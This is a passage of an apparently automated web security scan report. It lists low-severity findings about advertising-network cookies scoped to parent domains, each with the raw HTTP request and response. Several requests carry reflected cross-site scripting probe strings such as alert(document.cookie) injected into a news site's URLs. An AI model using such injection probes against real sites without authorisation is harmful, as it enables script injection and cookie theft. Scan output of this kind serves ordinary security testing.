Date: Tue, 03 May 2011 15:40:28 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=122;path=/; expires=Tue, 03-May-2013 20:00:00 GMT;domain=.yieldmanager.net
Set-Cookie: S=s=043pp296s08fc&t=1304437228;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 14437

(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"\u000a<img style=\"display:none\" width=0 height=0 alt=
...[SNIP]...

12.41. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EM4BCgHUBpGX; expires=Mon, 01-Aug-2011 15:41:44 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=861743843;fpan=1;fpa=P0-1669904396-1304455296993;ns=0;url=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert(1)-%2522ccebc516c28%3D1;ref=http%3A%2F%2Fburp%2Fshow%2F1;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=title.The%20Ledger%20Independent%20%7C%201-800-264-9091%2Csite_name.Ledger%20Independent%2Cimage.http%3A%2F%2Fwww%252Emaysville-online%252Ecom%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fledge;dst=1;et=1304455296992;tzo=300;a=p-700bcf3-jPMko HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EMQBBgHUBg

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ib.adnxs.com/getuid?http://cms.quantserve.com/dpixel?eid=5&id=$UID
Set-Cookie: d=EM4BCgHUBpGX; expires=Mon, 01-Aug-2011 15:41:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Tue, 03 May 2011 15:41:44 GMT
Server: QS

12.42. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-01-0VIaSjnOLg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EMQBBgHUBg; expires=Mon, 01-Aug-2011 15:41:30 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,503597,,5273,,300X250 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: mc=4d529fca-2c7e4-2f739-1ba49

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EMQBBgHUBg; expires=Mon, 01-Aug-2011 15:41:30 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Tue, 03 May 2011 15:41:30 GMT
Server: QS

GIF89a.......,.................D..;

12.43. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=4212%3D1; expires=Thu, 02-Jun-2011 15:41:38 GMT; path=/; domain=.rubiconproject.com
put_1185=3658195966029417970; expires=Sat, 02-Jul-2011 15:41:38 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=3658195966029417970&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4212%3D1; expires=Thu, 02-Jun-2011 15:41:38 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11695%2C0%2C1%2C%2C; expires=Thu, 02-Jun-2011 15:41:38 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=3658195966029417970; expires=Sat, 02-Jul-2011 15:41:38 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.44. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=5970d0a2-50bf-4e81-9e33-99fc5b6ccb0d; expires=Thu, 02-May-2013 15:41:37 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3658195966029417970 HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 15:41:37 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=5970d0a2-50bf-4e81-9e33-99fc5b6ccb0d; expires=Thu, 02-May-2013 15:41:37 GMT; path=/; domain=.openx.net
Location: /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3658195966029417970&cc=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.45. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3658195966029417970; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:39 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=4712109102545615229 HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=
Cookie: uid=3658195966029417970; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7Cundefined%7Cundefined%7C10%7Cundefined%7Cundefined%7C12; rds=15098%7C15098%7C15098%7C15098%7Cundefined%7C15098%7C15098%7Cundefined%7C15098%7C15098%7Cundefined%7Cundefined%7C15098%7Cundefined%7Cundefined%7C15098; rv=1

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ACID=cA130013044372470037; domain=advertising.com; expires=Thu, 02-May-2013 15:40:47 GMT; path=/
ASCID=cA130013044372470037; domain=advertising.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response

HTTP/1.1 302 Found
Connection: close
Date: Tue, 03 May 2011 15:40:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://r1-ads.ace.advertising.com/ctst=1/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1
Set-Cookie: ACID=cA130013044372470037; domain=advertising.com; expires=Thu, 02-May-2013 15:40:47 GMT; path=/
Set-Cookie: ASCID=cA130013044372470037; domain=advertising.com; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 03 May 2011 15:40:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 410

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://r1-ads.ace.advertising.com/ctst=1/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x12
...[SNIP]...

12.47. http://rs.gwallet.com/r1/pixel/x420r7209935 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x420r7209935

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4635041587697275136; Max-Age=31536000; Path=/; Domain=gwallet.com; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r7209935 HTTP/1.1
Host: rs.gwallet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4635041587697275136; Max-Age=31536000; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=g3; Max-Age=31536000; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=5; Max-Age=31536000; Path=/; Domain=gwallet.com; Version=1
Set-Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTA0IDg4ODg=;expires=Tue, 02-Feb-2016 18:09:42 GMT;path=/;

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

12.48. http://servedby.flashtalking.com/imp/3/15881 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

flashtalkingad1="GUID=12181FA2A61751";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:13 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:13 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=12181FA2A61751";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:13 GMT
Cache-Control: no-cache, no-store
Content-Length: 537
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175170010000 (MII-APC/1.6)

var ftGUID_124094="12181FA2A61751";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&f
...[SNIP]...

12.49. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid=4dc0222f-bc32-582b-1dda-5df0ca507885; domain=.mathtag.com; path=/; expires=Wed, 02-May-2012 15:41:35 GMT
ts=1304437295; domain=.mathtag.com; path=/; expires=Wed, 02-May-2012 15:41:35 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n2a pid 0x6b3e 27454
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 03 May 2011 15:41:35 GMT
Location: http://sync.mathtag.com/sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D&mm_bnc
Etag: 4dc0222f-bc32-582b-1dda-5df0ca507885
Connection: Keep-Alive
Set-Cookie: uuid=4dc0222f-bc32-582b-1dda-5df0ca507885; domain=.mathtag.com; path=/; expires=Wed, 02-May-2012 15:41:35 GMT
Set-Cookie: ts=1304437295; domain=.mathtag.com; path=/; expires=Wed, 02-May-2012 15:41:35 GMT
Content-Length: 0

12.50. http://tag.contextweb.com/TagPublish/getad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getad.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2W4=CT-USR; expires=Tue, 31-May-2011 15:41:28 GMT; path=/; domain=.contextweb.com
V=Yu2zAy2GkRR5; domain=.contextweb.com; expires=Thu, 03-May-2012 15:41:28 GMT; path=/
503597_3_94417=1304437289024; domain=.contextweb.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB28
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2787
Date: Tue, 03 May 2011 15:41:28 GMT
Connection: close
Set-Cookie: C2W4=CT-USR; expires=Tue, 31-May-2011 15:41:28 GMT; path=/; domain=.contextweb.com
Set-Cookie: V=Yu2zAy2GkRR5; domain=.contextweb.com; expires=Thu, 03-May-2012 15:41:28 GMT; path=/
Set-Cookie: 503597_3_94417=1304437289024; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 04-May-2011 04:00:00 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var strCreative=''
+ '\n'
+ '<script type="text/javascript">\n'
+ '//<![CDATA[\n'
+ 'ord=Math.random()*10000000000000000;\n'
+ 'document.write(\'<script type="text/javasc
...[SNIP]...

12.51. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=u9HjDXV5c/WBvF/1; expires=Sun, 30-Oct-2011 16:06:39 GMT; path=/; domain=.bluekai.com
bkc=KJhqpzU9LcAp9ymdhQa4HQRsC+P9F7DgvMIsOzc7OwnlEZ5Q6aJYXamSD4ZmeSCXW9lM0dW01WuG13nylbiC0GwLQdapsPc89vLosz6=; expires=Sun, 30-Oct-2011 16:06:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: bk=6VXkNLV5c/WBvF/1; bkc=KJpM8sJQter5QDanbR9F/y1e90Kx72v1075LxmVeSOC4MoKO/DvPWRUdHQNPwGRayz2kHmDe9/BhWPA=; bko=; bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bklc=4dc0222a; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015jumr9n9WD0OSx=; bkst=KJhMRjeMjVeQRxMv5eqnBYoy2MWmE5Jumr9n9Yf8OD6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 16:06:39 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 04 May 2011 16:06:39 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=u9HjDXV5c/WBvF/1; expires=Sun, 30-Oct-2011 16:06:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhqpzU9LcAp9ymdhQa4HQRsC+P9F7DgvMIsOzc7OwnlEZ5Q6aJYXamSD4ZmeSCXW9lM0dW01WuG13nylbiC0GwLQdapsPc89vLosz6=; expires=Sun, 30-Oct-2011 16:06:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 04-May-2011 16:06:39 GMT; path=/; domain=.bluekai.com
BK-Server: c5b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

12.52. http://tags.bluekai.com/site/3358 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3358

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4dc02217; expires=Thu, 05-May-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bk=tMvwQzV5c/WBvF/1; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bkc=KJpM8sJQter5QDazbR9F/y1e90Kx72v1075LxmVeSOC4MoKO/DvPWRUdHQNPwGRayz2kHmDe9aNhW1W=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101HjUmr9n9WEZOjW=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjeMjVeQRxMv5eqnBYoy2MWmEHJUmr9n9Yb+OEG=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3358?id=RiC6i2pCL3Ub HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: bk=DlMJlLV5c/WBvF/1; bkc=KJpnjVHQisaCRnQywXiU9xQ9sqWYlx==; bko=; bkp1=; bku=qxW99BY4DAtkc89a; bkw4=

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:41:11 GMT
Set-Cookie: bklc=4dc02217; expires=Thu, 05-May-2011 15:41:11 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 04 May 2011 15:41:11 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=tMvwQzV5c/WBvF/1; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpM8sJQter5QDazbR9F/y1e90Kx72v1075LxmVeSOC4MoKO/DvPWRUdHQNPwGRayz2kHmDe9aNhW1W=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101HjUmr9n9WEZOjW=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjeMjVeQRxMv5eqnBYoy2MWmEHJUmr9n9Yb+OEG=; expires=Sun, 30-Oct-2011 15:41:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 04-May-2011 15:41:11 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

12.53. http://www.3stepads.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.3stepads.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__cfduid=dca429cd02b061d92126feaaf92608be71304420966; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.3stepads.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.3stepads.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 03 May 2011 11:09:26 GMT
Content-Type: image/x-icon
Connection: keep-alive
Last-Modified: Sun, 12 Jul 2009 17:35:32 GMT
Content-Length: 2550
CF-Cache-Status: HIT
Expires: Tue, 03 May 2011 13:09:26 GMT
Cache-Control: public, max-age=7200
Accept-Ranges: bytes
Set-Cookie: __cfduid=dca429cd02b061d92126feaaf92608be71304420966; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.3stepads.com
Set-Cookie: __cfduid=dca429cd02b061d92126feaaf92608be71304420966; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.3stepads.com

..............h...&......... .h.......(....... ...............................O.M.........................l.i.........b._.........W.T.G.E......$........~.g.d..z..r.n.........P.N..{.../.......,..i.f.c.
...[SNIP]...

12.54. http://www.bfcu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bfcu.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

Apache=173.193.214.243.1304420598988399; path=/; expires=Fri, 30-Apr-21 11:03:18 GMT; domain=.bfcu.org

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
